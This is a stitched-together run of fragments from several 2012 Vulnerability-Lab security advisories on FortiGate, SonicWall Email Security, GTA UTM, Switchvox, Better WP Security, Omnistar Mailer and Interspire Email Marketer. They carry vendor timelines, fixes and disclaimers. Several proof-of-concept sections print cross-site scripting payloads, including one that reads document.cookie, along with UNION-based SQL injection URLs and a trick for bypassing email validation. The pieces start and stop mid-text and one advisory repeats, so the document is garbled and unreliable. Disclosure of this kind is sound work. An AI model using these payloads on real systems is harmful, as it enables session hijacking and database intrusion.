http://esserver.127.0.0.1:8080/alert_history.html[POST REQUEST]row=200%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c http://esserver.127.0.0.1:8080/policy_approval_box.html?pathname=%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c Solution: = The Email Security 7.3.6 patch that addresses this set of issues has now been posted and is available to all of our Email Security customers from the download section of our customer portal (https://www.mysonicwall.com/Firmware/DownloadCenter.aspx). Risk: = 1.1 The security risk of the persistent input validation vulnerabilities are estimated as high(-). 1.2 The security risk of the client side cross site scripting vulnerabilities are estimated as low(+). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities
Title: == Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities Date: = 2012-09-06 References: === http://www.vulnerability-lab.com/get_content.php?id=557 VL-ID: = 557 Common Vulnerability Scoring System: 5 Introduction: = The FortiGate series of multi-threat security systems detect and eliminate the most damaging, content-based threats from email and Web traffic such as viruses, worms, intrusions, inappropriate Web content and more in real time - without degrading network performance. Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 series for large enterprises, service providers and carriers, the FortiGate line combines the FortiOS™ security operating system with FortiASIC processors and other hardware to provide a comprehensive and high-performance array of security and networking functions including: * Firewall, VPN, and Traffic Shaping * Intrusion Prevention System (IPS) * Antivirus/Antispyware/Antimalware * Web Filtering * Antispam * Application Control (e.g., IM and P2P) * VoIP Support (H.323. and SCCP) * Layer 2/3 routing * Multiple WAN interface options FortiGate appliances provide cost-effective, comprehensive protection against network, content, and application-level threats - including complex attacks favored by cybercriminals - without degrading network availability and uptime. FortiGate platforms incorporate sophisticated networking features, such as high availability (active/active, active/passive) for maximum network uptime, and virtual domain (VDOM) capabilities to separate various networks requiring different security policies. Since 2009 Fortigate appliance series got certified by the U.S. Army and is now listed in the Information Assurance Approved Products List (IA APL). The military provides high security standards to secure outdoor camps, air base, offices with fortigate hardware. (Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate ) Abstract: = Vulnerability-Lab Research Team discovered multiple persistent Web Vulnerabilities in the FortiGate UTM Appliance Application. Report-Timeline: 2012-05-06: Researcher Notification Coordination 2012-05-10: Vendor Notification 2012-06-11: Vendor Response/Feedback 2012-08-25: Vendor Fix/Patch ( Fixed in FortiOS v4.3.8 B0537 Fixed in FortiOS v5.0 ) 2012-09-06: Public or Non-Public Disclosure Status: Published Affected Products: == Fortigate Product: UTM Appliance Application vFortiGate-5000 Series;FortiGate-3950 Series;FortiGate-3810A; Exploitation-Technique: === Remote Severity: = High Details: Multiple input validation vulnerabilities(persistent) are detected in the FortiGate UTM Appliance Application. Remote attackers low privileged user accounts can inject (persistent) own malicious script code to manipulate specific customer/admin requests. The vulnerability allows an local low privileged attacker to manipulate the appliance(application) via persistent script code inject. The vulnerability is locaed in the Add or Tags module category listing with the bound vulnerable applied tags tags display parameters. Successful exploitation results in content module request manipulation, execution of persistent malicious script code, session hijacking, account steal persistent phishing. Vulnerable Module(s): (Persistent) [+] Tags - Applied tags [+] Add - Tags Display Interface - UTM WAF Web Application [Appliance] FortiGate-5000 Series;FortiGate-3950 Series;FortiGate-3810A;FortiGate-3600A;FortiGate-3016B;FortiGate-1240B FortiGate-800;FortiGate-620B;FortiGate-311B;FortiGate-310B;FortiGate-300A;FortiGate-224B;FortiGate-200B Series Proof of Concept: = The persistent vulnerabilities can be exploited by remote attackers with low required user inter action or low privileged user account. For demonstration or reproduce ... Code Review:Tags - Applied tags [Box] Listing URL: http://appliance.127.0.0.1:1337/firewall/policy/policy6?expanded=# name=``addr_dlg`` action=``/firewall/address/add`` onsubmit=``if (!fwad_form_check('Please choose one address/group.', 'Please choose one interface to connect.')) return false; if (document.forms[0].submitFlag) return false; document.forms[0]. submitFlag = true;`` tabletbodytr td align=``left`` width=``150``nobrAddress Name/nobr/td td align=``left``input name=``name`` size=``64`` maxlength=``63`` value=``all`` type=``text`` /td /tr tr tdColor/td tdspan colorclassprefix=``addr_ipv6_ `` class=``icon_fw addr_ipv6_13`` id=``addressIcon``/span a href=``#`` id=``addressColor`` cscolorvalue=``0``[Change]input value=``13`` name=``csColor1`` type
Fortigate UTM WAF Appliance - Cross Site Vulnerabilities
Title: == Fortigate UTM WAF Appliance - Cross Site Vulnerabilities Date: = 2012-09-07 References: === http://www.vulnerability-lab.com/get_content.php?id=559 VL-ID: = 559 Common Vulnerability Scoring System: 3.5 Introduction: = The FortiGate series of multi-threat security systems detect and eliminate the most damaging, content-based threats from email and Web traffic such as viruses, worms, intrusions, inappropriate Web content and more in real time - without degrading network performance. Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 series for large enterprises, service providers and carriers, the FortiGate line combines the FortiOS™ security operating system with FortiASIC processors and other hardware to provide a comprehensive and high-performance array of security and networking functions including: * Firewall, VPN, and Traffic Shaping * Intrusion Prevention System (IPS) * Antivirus/Antispyware/Antimalware * Web Filtering * Antispam * Application Control (e.g., IM and P2P) * VoIP Support (H.323. and SCCP) * Layer 2/3 routing * Multiple WAN interface options FortiGate appliances provide cost-effective, comprehensive protection against network, content, and application-level threats - including complex attacks favored by cybercriminals - without degrading network availability and uptime. FortiGate platforms incorporate sophisticated networking features, such as high availability (active/active, active/passive) for maximum network uptime, and virtual domain (VDOM) capabilities to separate various networks requiring different security policies. Fortigate applainces are Pentagon US Military certified. The military provides high security standards save outdoor camps, air base, offices with fortigate hardware. (Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate ) Abstract: = Vulnerability-Lab Research Team discovered multiple non-persistent Web Vulnerabilities in the FortiGates UTM Appliance Application. Report-Timeline: 2012-05-07: Researcher Notification Coordination 2012-05-10: Vendor Notification 2012-06-08: Vendor Response/Feedback 2012-08-30: Vendor Fix/Patch ( FortiOS v4.3.8 B0630 FortiOS v5.0 B064 ) 2012-09-07: Public or Non-Public Disclosure Status: Published Affected Products: == Fortigate Product: UTM Firewall Appliance Application vFortiGate-5000 Series;FortiGate-3950 Series;FortiGate-3810A; Exploitation-Technique: === Remote Severity: = Medium Details: Multiple input validation vulnerabilities (non-persistent) are detected in the FortiGates UTM Appliance Application. The vulnerability allows remote attackers to hijack admin/customer sessions with required user inter action (client-side). Successful exploitation allows to phish user accounts, hijacking sessions, redirect over client side requests or manipulate website context on client-side browser requests. Vulnerable Module(s): (Non-Persistent) [+] Exception Handling - objusagedlg [+] WiFi-controller SSID - Topic [+] Display Message - Title Message Picture(s): ../1.png ../2.png Interface - UTM WAF Web Application [Appliance] FortiGate-5000 Series;FortiGate-3950 Series;FortiGate-3810A;FortiGate-3600A;FortiGate-3016B;FortiGate-1240B FortiGate-800;FortiGate-620B;FortiGate-311B;FortiGate-310B;FortiGate-300A;FortiGate-224B;FortiGate-200B Series Proof of Concept: = The non-persistent vulnerability can be exploited by remote attackers with medium or high required user inter action. For demonstration or reproduce ... Code Review:Exception Handling - objusagedlg URL:http://appliance.127.0.0.1:137/objusagedlg?type=220mkey= div style=text-align: center;h2WiFi-controller SSID span class=emphasized_msg[EXECUTES NON-PERSISTENT SCRIPTCODE HERE!] /span is used by:/h2divTotal References: span id=total_refcount/span/divdiv class=info_msgspan id=total_unused /span object types that may be configured to use this object have no references (span id=unused_toggle/span)/div form name=search_paramsinput name=type value=220 type=hiddeninput name=mkey value= type=hidden iframe src=objusagedlg-Dateien/hack.htm [EXECUTES NON-PERSISTENT SCRIPTCODE HERE!]' =input type=hidden name=mkey_display value= //formdiv id=reftable-container/div Code Review:Display Message - Title Message URL: https://appliance.127.0.0.1:137/displaymessage?url=/webfilter/profile/dlgtitle= td[EXECUTES NON-PERSISTENT SCRIPTCODE HERE!]' = td= /tr /table/td /tr tr td class
GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities
=secret_hidden name=secret_hidden value= type=hiddeninput id=allowGenCert name=allowGenCert value=1 type=hiddeninput id=remotePW_hidden name=remotePW_hidden value= type=hidden iframe src=user-list_data/[PERSISTENT SCRIPT CODE!]' =/td/tr tr td ... identity class=forminput id=identity name=identity type=text size=60 maxlength=127 value=iframe src=[PERSISTENT SCRIPT CODE!] #34;) / /td /tr ... fullName td colspan=3input class=forminput id=fullName name=fullName type=text size=60 maxlength=59 value=iframe src=a [PERSISTENT SCRIPT CODE!]) / /td /tr tr ... desc td colspan=3input class=forminput id=desc name=desc type=text size=60 maxlength=79 value=iframe src=a #34;[PERSISTENT SCRIPT CODE!]) / /td /tr ... or the secret_hidden input id=strength name=strength value=95 type=hiddeninput id=secret_hidden name=secret_hidden value= type=hidden[PERSISTENT SCRIPT CODE!])' =input id=allowGenCert name=allowGenCert type=hidden value=1 / URL:http://gta.127.0.0.1/config/accounts/user/user-fs_en_6.0.3 Review: VPN Certificate - Details Listing tr td class=formlabelSubject:/td tdemailAddress = \[PERSISTENT SCRIPT CODE!]) , CN = \[PERSISTENT SCRIPT CODE!]) , O = [PERSISTENT SCRIPT CODE!] , L = [PERSISTENT SCRIPT CODE!]) , ST = [PERSISTENT SCRIPT CODE!]) , C = US, OU = i[PERSISTENT SCRIPT CODE!]) /td /tr Note: The vulnerable content certificate can also be exported via download function to review the problem. URL: http://gta.127.0.0.1/config/vpn/certs/certs-fs_en_6.0.3 Solution: = Parse the input field values secret_hidden, remotePW_hidden, identity, form input desc, fullName emailAddress. Restrict the name input fields with a special filter when processing to load strings with tags like ( , double quotes co. ...). Parse also the vulnerable output listing were the script code is getting unsanitized executed out of the waf application context. Risk: = The vulnerabilities can be exploited with low required user inter action privileged user account. The security risk of the persistent input validation vulnerabilities are estimated as medium. Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY ADMINISTRATION CONTACT: ad...@vulnerability-lab.com
Switchvox Asterisk v5.1.2 - Multiple Web Vulnerabilities
the poc press on test CRM Settings 3- Setup - Groups - Create Extension Group [Note] 4- Setup - Outgoing calls - Create Outgoing Call rule [Note] 5- Setup - Incoming Calls - Caller DID routes - Create Single DID Route [Note] 6- Setup - Incoming Calls - Caller ID Rules - Create Call transfer Call [Note] 1. URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=modify_soundsound_id=478 div class=desc_divbDescription:/b Your new password must be different than your old password. Please try again.br[PERSISTENT INJECTED SCRIPT CODE!]br/[PERSISTENT INJECTED SCRIPT CODE!])/ifram/iframe/div 2. URL: https://asterisk-switchvox.127.0.0.1:1337/admin?plugin_name=sugarcrmadmin_sbplugins_id=1cmd=modify_crm_pluginsugarcrm=1 [1101],plugin_type:system,plugin_description:Lookup up and display contact information straight from your SugarCRM server.,plugin_display:SugarCRM,plugin_name:sugarcrm,admin_sbplugins_id:1,proxy:http://\[PERSISTENT INJECTED SCRIPT CODE!]) /iframe,uri:http://\[PERSISTENT INJECTED SCRIPT CODE!]) 3. URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=extension_groups div style=margin-right: 5px; display: none;div style=width: 400px; class=pwm_container_paddingdiv[PERSISTENT INJECTED SCRIPT CODE!]) /iframe'[PERSISTENT INJECTED SCRIPT CODE!])/iframe[PERSISTENT INJECTED SCRIPT CODE!]) /iframe'/iframe/divdiv class=clear/div/div/div/div div style=display: none; class=pwm_top_arrow/divdiv style=left: 187px; top: 354px; class=pwm_bottom_arrow/div 4. URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=add_outgoing_rule {call_through:{internal:{}},priority:9,name:test,description:\[PERSISTENT INJECTED SCRIPT CODE!])/iframe \ [PERSISTENT INJECTED SCRIPT CODE!],failovers:{},is_final:0,pattern:Begins with 13 and the remainder is 23 to 90 digits in length,id:103,context_type:USER}],total_items:9}},allExtensions: 5. URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=incoming_rulespassthrough=1#pageTab=did_routes code number:123,name:test,note:\[PERSISTENT INJECTED SCRIPT CODE!])/iframe,force_fax:0,any_provider:1,type:route_number,id:3,call_type:0}, {priority:2,action:busy,type:catchall_unknown_route,id:1}],total_items:3}},switchvox_version:40062, menu_structure:[{children:[{children:[{cmd:view_extensions,id:manage_extensions,display:Manage},{cmd:extension_groups,id:extension_groups,display:Groups},{cmd:extension_templates,id:extension_templates,display:Templates}, {cmd:extension_permissions,id:extension_permissions,display:Permissions},{cmd:phone_setup,id:extension_phones,display:Phones}, {cmd:extension_settings,id:extension_settings,display:Settings}],id:extensions,column:1,display:Extensions},{children: [{cmd:channel_groups,id:channel_groups,display:Channel Groups},{cmd:voip_providers,id:voip_providers,display:VOIP Providers}, {cmd:outgoing_rules,id:outgoing_calls,display:Outgoing Calls}, 6. URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=incoming_rules#pageTab=caller_id_rules Risk: = The security risk of the persistent input validation vulnerabilities are estimated as medium(+). Credits: Vulnerability Laboratory [Research Team] -Ibrahim M. El-Sayed [the StOrM) (st...@vulnerability-lab.com) [http://iel-sayed.blogspot.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form
Better WP Security v3.4.3 Wordpress - Web Vulnerabilities
Title: == Better WP Security v3.4.3 Wordpress - Web Vulnerabilities Date: = 2012-08-20 References: === http://www.vulnerability-lab.com/get_content.php?id=691 VL-ID: = 691 Common Vulnerability Scoring System: 3.5 Introduction: = plugin thereby ensuring that as many security holes as possible are patched without having to worry about conflicting features or the possibility of missing anything on your site. With one-click activation for most features as well as advanced features for experienced users Better WP Security can help protect any site. (Copy of the Vendor Homepage: http://wordpress.org/extend/plugins/better-wp-security/ ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple persistent web vulnerabilities in the Better WP security v3.4.3 Wordpress Application Addon. Report-Timeline: 2012-08-21: Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation vulnerabilities are detected in the Better WP security v3.4.3 Wordpress Application Addon. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user inter action. The bugs are located on server side in the Limit Login Attempts, Exception Handling Error Intrusion Detection module with the bound vulnerable email address error parameter. Successful exploitation can result in wordpress application account steal, client side phishing client-side content request manipulation. Exploitation requires medium or high user inter action without privileged web application user account. Vulnerable Module(s): [+] Better WP Security - Limit Login Attempts Intrusion Detection [+] Exception Handling Error Vulnerable Parameter(s): [+] Email Address [+] Error Proof of Concept: = The persistent vulnerability can be exploited by remote attackers with low required user inter action low privileged application user account. For demonstration or reproduce ... Inject the following example string to the application input (persistent) or parameter (client side) String: iframe src=http://www.vulnerability-lab.com/iframe Review: Listings tr valign=top th scope=row class=settinglabel label for= ll_emailaddress=Email Address/label /th td class=settingfield input id=ll_emailaddress name=ll_emailaddress value=\ type=text [PERSISTENT INJECTED SCRIPT CODE!])' = ad...@vulnerability-lab.com= Review: Exception Handling div class=error style=text-align: center;p style=color: red; font-size: 14px; font-weight: bold;Attention !/pp Please add this site now to your a target=_blank href=http://managewp.com/wp-admin;ManageWP.com/a account. Or deactivate the Worker plugin to avoid a target=_blank href=http://managewp.com/user-guide/security;security issues/a. /p/divdiv id=message class=errorpLogin time period needs to be aan integer greater than 0./p/div div id=message class=errorp\[PERSISTENT INJECTED SCRIPT CODE!])' = is= not= a= valid= ip.= p=/div Solution: = The vulnerabilities can be patched by parsing the email address error exception handling parameters and output listing. Risk: = The security risk of the persistent input validation vulnerabilities are estimated as medium. Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab
Switchvox Asterisk v5.1.2 - Multiple Web Vulnerabilities
the poc press on test CRM Settings 3- Setup - Groups - Create Extension Group [Note] 4- Setup - Outgoing calls - Create Outgoing Call rule [Note] 5- Setup - Incoming Calls - Caller DID routes - Create Single DID Route [Note] 6- Setup - Incoming Calls - Caller ID Rules - Create Call transfer Call [Note] 1. URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=modify_soundsound_id=478 div class=desc_divbDescription:/b Your new password must be different than your old password. Please try again.br[PERSISTENT INJECTED SCRIPT CODE!]br/[PERSISTENT INJECTED SCRIPT CODE!])/ifram/iframe/div 2. URL: https://asterisk-switchvox.127.0.0.1:1337/admin?plugin_name=sugarcrmadmin_sbplugins_id=1cmd=modify_crm_pluginsugarcrm=1 [1101],plugin_type:system,plugin_description:Lookup up and display contact information straight from your SugarCRM server.,plugin_display:SugarCRM,plugin_name:sugarcrm,admin_sbplugins_id:1,proxy:http://\[PERSISTENT INJECTED SCRIPT CODE!]) /iframe,uri:http://\[PERSISTENT INJECTED SCRIPT CODE!]) 3. URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=extension_groups div style=margin-right: 5px; display: none;div style=width: 400px; class=pwm_container_paddingdiv[PERSISTENT INJECTED SCRIPT CODE!]) /iframe'[PERSISTENT INJECTED SCRIPT CODE!])/iframe[PERSISTENT INJECTED SCRIPT CODE!]) /iframe'/iframe/divdiv class=clear/div/div/div/div div style=display: none; class=pwm_top_arrow/divdiv style=left: 187px; top: 354px; class=pwm_bottom_arrow/div 4. URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=add_outgoing_rule {call_through:{internal:{}},priority:9,name:test,description:\[PERSISTENT INJECTED SCRIPT CODE!])/iframe \ [PERSISTENT INJECTED SCRIPT CODE!],failovers:{},is_final:0,pattern:Begins with 13 and the remainder is 23 to 90 digits in length,id:103,context_type:USER}],total_items:9}},allExtensions: 5. URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=incoming_rulespassthrough=1#pageTab=did_routes code number:123,name:test,note:\[PERSISTENT INJECTED SCRIPT CODE!])/iframe,force_fax:0,any_provider:1,type:route_number,id:3,call_type:0}, {priority:2,action:busy,type:catchall_unknown_route,id:1}],total_items:3}},switchvox_version:40062, menu_structure:[{children:[{children:[{cmd:view_extensions,id:manage_extensions,display:Manage},{cmd:extension_groups,id:extension_groups,display:Groups},{cmd:extension_templates,id:extension_templates,display:Templates}, {cmd:extension_permissions,id:extension_permissions,display:Permissions},{cmd:phone_setup,id:extension_phones,display:Phones}, {cmd:extension_settings,id:extension_settings,display:Settings}],id:extensions,column:1,display:Extensions},{children: [{cmd:channel_groups,id:channel_groups,display:Channel Groups},{cmd:voip_providers,id:voip_providers,display:VOIP Providers}, {cmd:outgoing_rules,id:outgoing_calls,display:Outgoing Calls}, 6. URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=incoming_rules#pageTab=caller_id_rules Risk: = The security risk of the persistent input validation vulnerabilities are estimated as medium(+). Credits: Vulnerability Laboratory [Research Team] -Ibrahim M. El-Sayed [the StOrM) (st...@vulnerability-lab.com) [http://iel-sayed.blogspot.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form
Omnistar Mailer v7.2 - Multiple Web Vulnerabilities
): [+] Form Name Proof of Concept: = 1.1 The SQL injection vulnerabilities can be exploited by remote attackers without user inter action. For demonstration or reproduce ... PoC: http://127.0.0.1:1337/mailertest/admin/responder.php?op=editid=-37'+Union+Select+version(),2,3--%20-# http://127.0.0.1:1337/mailer/admin/preview.php?id=-2'+union+Select+1--%20- http://127.0.0.1:1337/mailer/admin/pages.php?form_id=-2'+Union+Select+version(),2,3--%20-#%20-op=list http://127.0.0.1:1337/mailer/admin/navlinks.php?op=editnav_id=9''+Union+Select+version(),2,3--%20-# http://127.0.0.1:1337/mailertest/users/register.php?nav_id=-18'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20- http://127.0.0.1:1337/mailertest/admin/pages.php?op=editid=16form_id=2' http://127.0.0.1:1337/mailertest/admin/contacts.php?op=editid=3form_id=2' http://127.0.0.1:1337/mailertest/users/index.php?profile=1form_id=2' http://127.0.0.1:1337/mailertest/users/register.php?form_id=2' --- SQL Exception --- SQL error (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''9''' at line 3) in ( select navname,form_id,auto_subscribe,approve_members,confirm_email,signup_redirect,email_forward from mailer75_navlinks where nav_id='9'' ) 1.2 The persistent input validation vulnerability can be exploited by remote attackers with low required user inter action low privileged user account. For demonstration or reproduce ... The attacker create a form and insert in form name field own malicious javascript or html code. To create the form the attacker should to go to Customise Interface - Create Website Forms - Create Standard Registration Form - Add form Then inject the malicious script code i.e., iframe src=www.vuln-lab.com onload=alert(VL)/ When the user browses the forms page in the control panel, or any user trying to register for the website, the persistent injected script code will be executed out of the web application context. Risk: = 1.1 The security risk of the blind SQL injection vulnerability is estimated as critical. 1.2 The security risk of the persistent input validation vulnerability is estimated as medium(+). Credits: Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [st...@vulnerability-lab.com] [iel-sayed.blogspot.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Interspire Email Marketer v6.0.1 - Multiple Vulnerabilites
exploitation of the vulnerability result in account steal, client site phishing or client-side content request manipulation. Vulnerable Module(s): [+] dynamiccontenttags Vulnerable File(s): [+] admin/index.php?Page=AddonsAddon=dynamiccontenttags Vulnerable Parameter(s): [+] Action Proof of Concept: = 1.1 The SQL injection vulnerability can be exploited by remote attackers without user inter action. For demonstration or reproduce ... PoC: http://emailmarketer.127.0.0.1:337/admin/index.php?Page=AddonsAddon=dynamiccontenttags; Action=Editid=-1%27+UNION+Select+1,2,3,4--%20- http://emailmarketer.127.0.0.1:337/admin/index.php?Page=AddonsAddon=dynamiccontenttags; Action=Editid=-1%27+UNION+Select+1,version%28%29,3,4--%20- 1.2 The persistent input validation vulnerabilities can be exploited by remote attackers with low or medium required user inter action low privileged user account. For demonstration or reproduce ... 1.2.1 The attacker can create a user with injecting a malicious code i.e., iframe src=http://www.vulnerability-lab.com onload=alert(VL)/iframe, in the field Full name. When the admin views the users the code gets executed. The attacker also can change his full name in the settings and whenever the admin checks the user list, the code gets executed URL: http://emailmarketer.127.0.0.1:337/admin/index.php?Page=UsersAction=Add 1.2.2 The attacker can Create a User group and inject a malicious code in the Group name. Whenever the victim lists the user groups, the code gets executed in the victim browser. URL: http://emailmarketer.127.0.0.1:337/admin/index.php?Page=UsersGroupsAction=createGroup 1.2.3 The attacker can inject a malicious code in the server side by adding a contact. The attacker goes to Contacts - add contact and then try to inject a malicious code in the email field. An error message will pop up that the email is invalid. To bypass, this message, the attacker creates a normal user with any email i.e., t...@test.com. After creating the user, the 